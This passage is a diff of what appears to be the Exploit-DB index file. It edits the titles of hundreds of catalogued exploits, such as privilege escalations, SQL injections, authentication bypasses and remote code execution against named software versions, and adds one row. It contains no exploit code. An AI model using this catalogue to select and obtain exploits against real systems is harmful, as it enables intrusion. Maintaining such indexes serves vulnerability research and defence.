id,file,description,date,author,platform,type,port 40722,platforms/windows/dos/40722.html,"Microsoft Internet Explorer 9 - MSHTML CPtsTextParaclient::CountApes Out-of-Bounds Read",2016-11-07,Skylined,windows,dos,0 40731,platforms/linux/dos/40731.c,"Linux Kernel - TCP Related Read Use-After-Free",2016-08-18,"Marco Grassi",linux,dos,0 40744,platforms/windows/dos/40744.txt,"Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)",2016-11-09,"laurent gaffie",windows,dos,0 -40745,platforms/windows/dos/40745.c,"Microsoft Windows Kernel - win32k Denial of Service (MS16-135)",2016-11-09,TinySec,windows,dos,0 +40745,platforms/windows/dos/40745.c,"Microsoft Windows Kernel - 'win32k' Denial of Service (MS16-135)",2016-11-09,TinySec,windows,dos,0 40747,platforms/windows/dos/40747.html,"Microsoft WININET.dll - CHttp­Header­Parser::Parse­Status­Line Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,windows,dos,0 40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9/10/11 - MSHTML 'PROPERTYDESC::Handle­Style­Component­Property' Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0 40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0 @@ -5508,7 +5508,7 @@ id,file,description,date,author,platform,type,port 42001,platforms/windows/dos/42001.py,"Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH)",2017-05-14,Muhann4d,windows,dos,0 42002,platforms/windows/dos/42002.txt,"Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)",2017-05-14,Muhann4d,windows,dos,0 42006,platforms/windows/dos/42006.cpp,"Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes Token",2017-05-15,"Google Security Research",windows,dos,0 -42007,platforms/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - nt!NtTraceControl (EtwpSetProviderTraits) Pool Memory Disclosure",2017-05-15,"Google Security Research",windows,dos,0 +42007,platforms/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure",2017-05-15,"Google Security Research",windows,dos,0 42008,platforms/windows/dos/42008.cpp,"Microsoft Windows 7 Kernel - 'win32k!xxxClientLpkDrawTextEx' Stack Memory Disclosure",2017-05-15,"Google Security Research",windows,dos,0 42009,platforms/windows/dos/42009.txt,"Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys / tcpip.sys",2017-05-15,"Google Security Research",windows,dos,0 42014,platforms/ios/dos/42014.txt,"Apple iOS < 10.3.2 - Notifications API Denial of Service",2017-05-17,CoffeeBreakers,ios,dos,0 @@ -5683,8 +5683,8 @@ id,file,description,date,author,platform,type,port 42741,platforms/windows/dos/42741.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42742,platforms/windows/dos/42742.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42743,platforms/windows/dos/42743.cpp,"Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 -42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel - win32k.sys '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)",2017-09-18,"Google Security Research",windows,dos,0 -42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - win32k.sys .TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0 +42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)",2017-09-18,"Google Security Research",windows,dos,0 +42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0 42748,platforms/windows/dos/42748.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0 42758,platforms/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",windows,dos,0 @@ -5954,12 +5954,12 @@ id,file,description,date,author,platform,type,port 1032,platforms/windows/local/1032.cpp,"Kaspersky AntiVirus - 'klif.sys' Privilege Escalation",2005-06-07,"Ilya Rabinovich",windows,local,0 1034,platforms/windows/local/1034.cpp,"WinZip 8.1 - Command Line Local Buffer Overflow",2005-06-07,ATmaCA,windows,local,0 1043,platforms/osx/local/1043.c,"Apple Mac OSX 10.4 - launchd Race Condition",2005-06-14,intropy,osx,local,0 -1044,platforms/aix/local/1044.c,"AIX 5.2 - netpmon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 -1045,platforms/aix/local/1045.c,"AIX 5.2 - ipl_varyon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 +1044,platforms/aix/local/1044.c,"AIX 5.2 - 'netpmon' Local Privilege Escalation",2005-06-14,intropy,aix,local,0 +1045,platforms/aix/local/1045.c,"AIX 5.2 - 'ipl_varyon' Local Privilege Escalation",2005-06-14,intropy,aix,local,0 1046,platforms/aix/local/1046.c,"AIX 5.2 - 'paginit' Privilege Escalation",2005-06-14,intropy,aix,local,0 1073,platforms/solaris/local/1073.c,"Solaris 9/10 - 'ld.so' Privilege Escalation (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1074,platforms/solaris/local/1074.c,"Solaris 9/10 - 'ld.so' Privilege Escalation (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 -1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 - Licence Info Disclosure Local Exploit",2005-07-04,Kozan,windows,local,0 +1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 - Licence Information Disclosure Local Exploit",2005-07-04,Kozan,windows,local,0 1086,platforms/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure",2005-07-04,Kozan,windows,local,0 1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Privilege Escalation",2005-07-04,RusH,bsd,local,0 1091,platforms/windows/local/1091.c,"Internet Download Manager 4.0.5 - Input URL Stack Overflow",2005-07-06,c0d3r,windows,local,0 @@ -7378,8 +7378,8 @@ id,file,description,date,author,platform,type,port 19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation Vulnerabilities",1999-05-25,"Paul Cammidge",aix,local,0 19232,platforms/solaris/local/19232.txt,"SunOS 4.1.4 - arp(8c) Memory Dump",1994-02-01,anonymous,solaris,local,0 19233,platforms/solaris/local/19233.txt,"Solaris 7.0 - aspppd Insecure Temporary File Creation",1996-12-20,Al-Herbish,solaris,local,0 -19234,platforms/solaris/local/19234.c,"Solaris 7.0 cancel - Exploit",1999-03-05,"Josh A. Strickland",solaris,local,0 -19235,platforms/solaris/local/19235.txt,"Solaris 7.0 chkperm - Exploit",1996-12-05,"Kevin L Prigge",solaris,local,0 +19234,platforms/solaris/local/19234.c,"Solaris 7.0 - 'cancel' Exploit",1999-03-05,"Josh A. Strickland",solaris,local,0 +19235,platforms/solaris/local/19235.txt,"Solaris 7.0 - 'chkperm' Exploit",1996-12-05,"Kevin L Prigge",solaris,local,0 19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1-1 / Caldera OpenLinux 1.3/2.2 / KDE KDE 1.1/1.1. / RedHat Linux 6.0 - K-Mail File Creation",1999-06-09,"Brian Mitchell",linux,local,0 19243,platforms/linux/local/19243.txt,"G. Wilford man 2.3.10 - Symlink Exploit",1999-06-02,"Thomas Fischbacher",linux,local,0 19244,platforms/osx/local/19244.sh,"Apple Mac OSX Server 10.0 - Overload",1999-06-03,"Juergen Schmidt",osx,local,0 @@ -8446,7 +8446,7 @@ id,file,description,date,author,platform,type,port 34371,platforms/windows/local/34371.py,"BlazeDVD Pro Player 7.0 - '.plf' Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0 29190,platforms/osx/local/29190.txt,"Apple Mac OSX 10.4.x - Mach-O Binary Loading Integer Overflow",2006-11-26,LMH,osx,local,0 29194,platforms/osx/local/29194.c,"Apple Mac OSX 10.4.x - AppleTalk AIOCRegLocalZN IOCTL Stack Buffer Overflow",2006-11-27,LMH,osx,local,0 -29201,platforms/osx/local/29201.c,"Apple Mac OSX 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0 +29201,platforms/osx/local/29201.c,"Apple Mac OSX 10.4.x - 'Shared_Region_Make_Private_Np' Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0 29234,platforms/windows/local/29234.py,"VideoCharge Studio 2.12.3.685 - Buffer Overflow (SEH)",2013-10-27,metacom,windows,local,0 29239,platforms/php/local/29239.txt,"PHP 5.2 - Session.Save_Path() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-12-08,"Maksymilian Arciemowicz",php,local,0 29327,platforms/windows/local/29327.py,"Watermark Master 2.2.23 - Buffer Overflow (SEH)",2013-11-01,metacom,windows,local,0 @@ -9119,7 +9119,7 @@ id,file,description,date,author,platform,type,port 40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0 40950,platforms/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation",2016-12-22,"Hector X. Monsegur",aix,local,0 40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0 -40956,platforms/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0 +40956,platforms/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0 40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0 40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0 40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0 @@ -9306,6 +9306,7 @@ id,file,description,date,author,platform,type,port 43007,platforms/linux/local/43007.txt,"Shadowsocks - Log File Command Execution",2017-10-17,"X41 D-Sec GmbH",linux,local,0 43017,platforms/windows/local/43017.txt,"Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection",2017-10-19,hyp3rlinx,windows,local,0 43029,platforms/linux/local/43029.c,"Linux Kernel 4.14.0-rc4+ - 'waitid()' Privilege Escalation",2017-10-22,"@XeR_0x2A and @chaign_c",linux,local,0 +43033,platforms/windows/local/43033.py,"Mikogo 5.4.1.160608 - Local Credentials Disclosure",2017-10-23,LiquidWorm,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -10564,7 +10565,7 @@ id,file,description,date,author,platform,type,port 9319,platforms/windows/remote/9319.py,"SAP Business One 2005-A License Manager - Remote Buffer Overflow",2009-08-01,Bruk0ut,windows,remote,30000 9330,platforms/windows/remote/9330.py,"Amaya 11.2 - W3C Editor/Browser (defer) Remote Buffer Overflow (SEH)",2009-08-03,His0k4,windows,remote,0 9422,platforms/hardware/remote/9422.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (1)",2009-08-12,hkm,hardware,remote,0 -9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 - 'user.ini' Arbitrary Download",2009-08-13,"aBo MoHaMeD",hardware,remote,0 +9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 - 'user.ini' Arbitrary Disclosure",2009-08-13,"aBo MoHaMeD",hardware,remote,0 9443,platforms/windows/remote/9443.txt,"Adobe JRun 4 - 'logfile' Authenticated Directory Traversal",2009-08-18,DSecRG,windows,remote,0 9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin",2009-08-18,SuNHouSe2,hardware,remote,0 9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)",2009-08-18,Wraith,windows,remote,69 @@ -10710,7 +10711,7 @@ id,file,description,date,author,platform,type,port 10269,platforms/windows/remote/10269.html,"Haihaisoft Universal Player 1.4.8.0 - 'URL' Property ActiveX Buffer Overflow",2009-12-01,shinnai,windows,remote,0 10282,platforms/linux/remote/10282.py,"OrzHTTPd - Format String",2009-12-03,"Patroklos Argyroudis",linux,remote,80 10340,platforms/windows/remote/10340.pl,"Symantec (Multiple Products) - Intel Common Base Agent Remote Command Execution",2009-04-28,kingcope,windows,remote,0 -10362,platforms/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Download",2009-12-09,"AnTi SeCuRe",hardware,remote,0 +10362,platforms/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Disclosure",2009-12-09,"AnTi SeCuRe",hardware,remote,0 10365,platforms/windows/remote/10365.rb,"Eureka Email 2.2q - ERR Remote Buffer Overflow (Metasploit) (1)",2009-12-09,dookie,windows,remote,0 10375,platforms/windows/remote/10375.html,"SAP GUI for Windows - 'sapirrfc.dll' ActiveX Overflow",2009-12-10,Abysssec,windows,remote,0 10380,platforms/windows/remote/10380.pl,"Sunbird 0.9 - Array Overrun Code Execution",2009-12-11,"Maksymilian Arciemowicz and sp3x",windows,remote,0 @@ -10827,7 +10828,7 @@ id,file,description,date,author,platform,type,port 12865,platforms/hardware/remote/12865.txt,"Motorola Surfboard Cable Modem - Directory Traversal",2010-06-03,"S2 Crew",hardware,remote,0 40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80 13735,platforms/osx/remote/13735.py,"Apple Mac OSX EvoCam Web Server 3.6.6/3.6.7 - Buffer Overflow",2010-06-05,d1dn0t,osx,remote,8080 -13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - Live Malware (PoC)",2010-06-09,Unknown,multiple,remote,0 +13787,platforms/multiple/remote/13787.txt,"Adobe Flash / Reader - Live Malware (PoC)",2010-06-09,Unknown,multiple,remote,0 13808,platforms/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly (MS03-044)",2010-06-10,"Tavis Ormandy",windows,remote,0 13818,platforms/windows/remote/13818.txt,"Nginx 0.8.36 - Source Disclosure / Denial of Service",2010-06-11,Dr_IDE,windows,remote,0 13822,platforms/windows/remote/13822.txt,"Nginx 0.7.65/0.8.39 (dev) - Source Disclosure / Download",2010-06-11,"Jose A. Vazquez",windows,remote,0 @@ -12315,7 +12316,7 @@ id,file,description,date,author,platform,type,port 20405,platforms/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure",2000-11-14,steeLe,cgi,remote,0 20406,platforms/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 - Memory Contents Disclosure",2000-11-16,CORE-SDI,multiple,remote,0 20408,platforms/cgi/remote/20408.txt,"Markus Triska CGIForum 1.0 - 'thesection' Directory Traversal",2000-11-20,zorgon,cgi,remote,0 -20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - JSP Source Disclosure",2000-11-21,"Wojciech Woch",jsp,remote,0 +20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - .JSP Source Disclosure",2000-11-21,"Wojciech Woch",jsp,remote,0 20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - 'bb-hist.sh?HISTFILE' File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0 20414,platforms/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote,0 20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script (MS00-090)",2000-11-22,"Sandro Gauci",windows,remote,0 @@ -12567,7 +12568,7 @@ id,file,description,date,author,platform,type,port 20940,platforms/cgi/remote/20940.txt,"Tarantella Enterprise 3 3.x - TTAWebTop.cgi Arbitrary File Viewing",2001-06-18,kf,cgi,remote,0 20941,platforms/freebsd/remote/20941.pl,"W3M 0.1/0.2 - Malformed MIME Header Buffer Overflow",2001-06-19,White_E,freebsd,remote,0 20947,platforms/windows/remote/20947.txt,"1C: Arcadia Internet Store 1.0 - Arbitrary File Disclosure",2001-06-21,ViperSV,windows,remote,0 -20948,platforms/windows/remote/20948.txt,"1C: Arcadia Internet Store 1.0 - Show Path",2001-06-21,ViperSV,windows,remote,0 +20948,platforms/windows/remote/20948.txt,"1C: Arcadia Internet Store 1.0 - Path Disclosure",2001-06-21,ViperSV,windows,remote,0 20950,platforms/windows/remote/20950.c,"Microsoft Visual Studio RAD Support - Buffer Overflow",2001-06-21,"NSFOCUS Security Team",windows,remote,0 20951,platforms/windows/remote/20951.pm,"Microsoft Visual Studio RAD Support - Buffer Overflow (MS03-051) (Metasploit)",2001-06-21,"NSFOCUS Security Team",windows,remote,0 20953,platforms/linux/remote/20953.c,"eXtremail 1.x/2.1 - Remote Format String (2)",2001-06-21,mu-b,linux,remote,0 @@ -14282,7 +14283,7 @@ id,file,description,date,author,platform,type,port 30078,platforms/multiple/remote/30078.js,"Apple Safari 2.0.4 - Cross-Domain Browser Location Information Disclosure",2007-05-23,"Gareth Heyes",multiple,remote,0 30089,platforms/linux/remote/30089.txt,"Ruby on Rails 1.2.3 To_JSON - Script Injection",2007-05-25,BCC,linux,remote,0 30209,platforms/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin - Web Service Directory Traversal (Metasploit)",2013-12-11,Metasploit,windows,remote,8080 -30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 - Administrative Login Bypass (Metasploit)",2013-12-11,Metasploit,multiple,remote,80 +30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit)",2013-12-11,Metasploit,multiple,remote,80 30211,platforms/windows/remote/30211.txt,"EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet Remote Code Execution",2013-12-11,rgod,windows,remote,0 30212,platforms/php/remote/30212.rb,"vBulletin 5 - 'index.php/ajax/api/reputation/vote?nodeid' SQL Injection (Metasploit)",2013-12-11,Metasploit,php,remote,80 30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 - Parse Error Information Disclosure",2007-06-20,Prili,multiple,remote,0 @@ -14327,7 +14328,7 @@ id,file,description,date,author,platform,type,port 30491,platforms/multiple/remote/30491.java,"OWASP Stinger - Filter Bypass",2007-08-13,"Meder Kydyraliev",multiple,remote,0 30493,platforms/windows/remote/30493.js,"Microsoft XML Core Services 6.0 - SubstringData Integer Overflow",2007-08-14,anonymous,windows,remote,0 30495,platforms/multiple/remote/30495.html,"Apache Tomcat 6.0.13 - Host Manager Servlet Cross-Site Scripting",2007-08-14,"NTT OSS CENTER",multiple,remote,0 -30496,platforms/multiple/remote/30496.txt,"Apache Tomcat 6.0.13 - Cookie Handling Quote Delimiter Session ID Disclosure",2007-08-14,"Tomasz Kuczynski",multiple,remote,0 +30496,platforms/multiple/remote/30496.txt,"Apache Tomcat 6.0.13 - Insecure Cookie Handling Quote Delimiter Session ID Disclosure",2007-08-14,"Tomasz Kuczynski",multiple,remote,0 30499,platforms/multiple/remote/30499.txt,"RndLabs Babo Violent 2 - Multiple Vulnerabilities",2007-08-14,"Luigi Auriemma",multiple,remote,0 30502,platforms/java/remote/30502.txt,"Sun Java Runtime Environment 1.4.2 - Font Parsing Privilege Escalation",2007-08-15,"John Heasman",java,remote,0 30507,platforms/multiple/remote/30507.txt,"gMotor2 Game Engine - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",multiple,remote,0 @@ -17049,7 +17050,7 @@ id,file,description,date,author,platform,type,port 1881,platforms/php/webapps/1881.txt,"DreamAccount 3.1 - 'da_path' Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a - 'edit.php' Remote Password Disclosure",2006-06-05,DarkFig,php,webapps,0 1883,platforms/php/webapps/1883.txt,"Wikiwig 4.1 - 'wk_lang.php' Remote File Inclusion",2006-06-06,Kacper,php,webapps,0 -1884,platforms/asp/webapps/1884.htm,"myNewsletter 1.1.2 - 'adminLogin.asp' Login Bypass",2006-06-06,FarhadKey,asp,webapps,0 +1884,platforms/asp/webapps/1884.htm,"myNewsletter 1.1.2 - 'adminLogin.asp' Authentication Bypass",2006-06-06,FarhadKey,asp,webapps,0 1886,platforms/php/webapps/1886.txt,"OpenEMR 2.8.1 - 'fileroot' Remote File Inclusion",2006-06-07,Kacper,php,webapps,0 1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News 1.0 - 'post.php' Remote File Inclusion",2006-06-07,Kacper,php,webapps,0 1888,platforms/php/webapps/1888.txt,"Back-End CMS 0.7.2.1 - 'jpcache.php' Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0 @@ -17657,7 +17658,7 @@ id,file,description,date,author,platform,type,port 2694,platforms/php/webapps/2694.php,"T.G.S. CMS 0.1.7 - 'logout.php' SQL Injection",2006-10-31,Kacper,php,webapps,0 2696,platforms/php/webapps/2696.php,"Invision Power Board 2.1.7 - 'Debug' Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0 2697,platforms/php/webapps/2697.php,"Innovate Portal 2.0 - 'acp.php' Remote Code Execution",2006-11-01,Kacper,php,webapps,0 -2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - '/admin/configuration.inc.php' Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 +2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - '/admin/configuration.inc.php' Local File Inclusion",2006-11-01,Kw3[R]Ln,php,webapps,0 2701,platforms/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure",2006-11-01,securfrog,php,webapps,0 2702,platforms/php/webapps/2702.php,"Lithium CMS 4.04c - '/classes/index.php' Local File Inclusion",2006-11-02,Kacper,php,webapps,0 2703,platforms/php/webapps/2703.txt,"Article System 0.6 - 'volume.php' Remote File Inclusion",2006-11-02,GregStar,php,webapps,0 @@ -17714,8 +17715,8 @@ id,file,description,date,author,platform,type,port 2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 - Local File Inclusion / Arbitrary File Upload/Delete",2006-11-13,r0ut3r,php,webapps,0 2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - '/actions_client/gallery.php' Local File Inclusion",2006-11-13,Kacper,php,webapps,0 2772,platforms/asp/webapps/2772.htm,"Online Event Registration 2.0 - 'save_profile.asp' Pass Change Exploit",2006-11-13,ajann,asp,webapps,0 -2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Login Bypass",2006-11-13,ajann,asp,webapps,0 -2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - 'vir_Login.asp' Remote Login Bypass",2006-11-13,ajann,asp,webapps,0 +2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Authentication Bypass",2006-11-13,ajann,asp,webapps,0 +2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - 'vir_Login.asp' Remote Authentication Bypass",2006-11-13,ajann,asp,webapps,0 2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion",2006-11-13,Firewall,php,webapps,0 2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 - Arbitrary File Upload / Cross-Site Scripting",2006-11-14,Timq,php,webapps,0 2777,platforms/php/webapps/2777.txt,"Aigaion 1.2.1 - 'DIR' Remote File Inclusion",2006-11-14,navairum,php,webapps,0 @@ -17723,7 +17724,7 @@ id,file,description,date,author,platform,type,port 2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Login Bypass 'SQL Injection'",2006-11-14,ajann,asp,webapps,0 2780,platforms/asp/webapps/2780.txt,"NetVIOS 2.0 - 'page.asp' SQL Injection",2006-11-14,ajann,asp,webapps,0 2781,platforms/asp/webapps/2781.txt,"blogme 3.0 - Cross-Site Scripting / Authentication Bypass",2006-11-14,"Security Access Point",asp,webapps,0 -2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart - Remote Login Bypass",2006-11-14,"Security Access Point",asp,webapps,0 +2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart - Remote Authentication Bypass",2006-11-14,"Security Access Point",asp,webapps,0 2786,platforms/php/webapps/2786.txt,"torrentflux 2.2 - Arbitrary File Create/ Execute/Delete",2006-11-15,r0ut3r,php,webapps,0 2790,platforms/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - '/manager/index.php' Local File Inclusion",2006-11-16,Revenge,php,webapps,0 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",php,webapps,0 @@ -17805,7 +17806,7 @@ id,file,description,date,author,platform,type,port 2906,platforms/php/webapps/2906.pl,"Fantastic News 2.1.4 - 'news.php' SQL Injection",2006-12-09,Bl0od3r,php,webapps,0 2907,platforms/asp/webapps/2907.txt,"SpotLight CRM 1.0 - 'login.asp' SQL Injection",2006-12-09,ajann,asp,webapps,0 2908,platforms/asp/webapps/2908.txt,"Request For Travel 1.0 - 'product' SQL Injection",2006-12-09,ajann,asp,webapps,0 -2909,platforms/asp/webapps/2909.txt,"HR Assist 1.05 - 'vdateUsr.asp' Remote Login Bypass",2006-12-09,ajann,asp,webapps,0 +2909,platforms/asp/webapps/2909.txt,"HR Assist 1.05 - 'vdateUsr.asp' Remote Authentication Bypass",2006-12-09,ajann,asp,webapps,0 2913,platforms/php/webapps/2913.php,"PHPAlbum 0.4.1 Beta 6 - 'language.php' Local File Inclusion",2006-12-10,Kacper,php,webapps,0 2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 - 'common.php' Remote File Inclusion",2006-12-11,bd0rk,php,webapps,0 2919,platforms/php/webapps/2919.pl,"mxBB Module Activity Games 0.92 - Remote File Inclusion",2006-12-11,3l3ctric-Cracker,php,webapps,0 @@ -20045,7 +20046,7 @@ id,file,description,date,author,platform,type,port 6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 (Calendar Module) - SQL Injection",2008-07-30,Jack,php,webapps,0 6172,platforms/php/webapps/6172.pl,"Pligg CMS 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0 6173,platforms/php/webapps/6173.txt,"Pligg CMS 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps,0 -6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Login Bypass",2008-07-31,gnix,php,webapps,0 +6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Authentication Bypass",2008-07-31,gnix,php,webapps,0 6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 (non-patched) - Remote Code Execution",2008-07-31,Raz0r,php,webapps,0 6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution",2008-07-31,EgiX,php,webapps,0 6179,platforms/php/webapps/6179.txt,"LetterIt 2 - 'Language' Local File Inclusion",2008-07-31,NoGe,php,webapps,0 @@ -20542,9 +20543,9 @@ id,file,description,date,author,platform,type,port 6876,platforms/php/webapps/6876.txt,"Venalsur on-line Booking Centre - Cross-Site Scripting / SQL Injection",2008-10-29,d3b4g,php,webapps,0 6877,platforms/php/webapps/6877.txt,"Pro Traffic One - 'poll_results.php' SQL Injection",2008-10-29,"Hussin X",php,webapps,0 6879,platforms/php/webapps/6879.txt,"MyPHP Forum 3.0 - Edit Topics/Blind SQL Injection",2008-10-30,StAkeR,php,webapps,0 -6881,platforms/php/webapps/6881.txt,"Absolute File Send 1.0 - Remote Cookie Handling",2008-10-30,Hakxer,php,webapps,0 +6881,platforms/php/webapps/6881.txt,"Absolute File Send 1.0 - 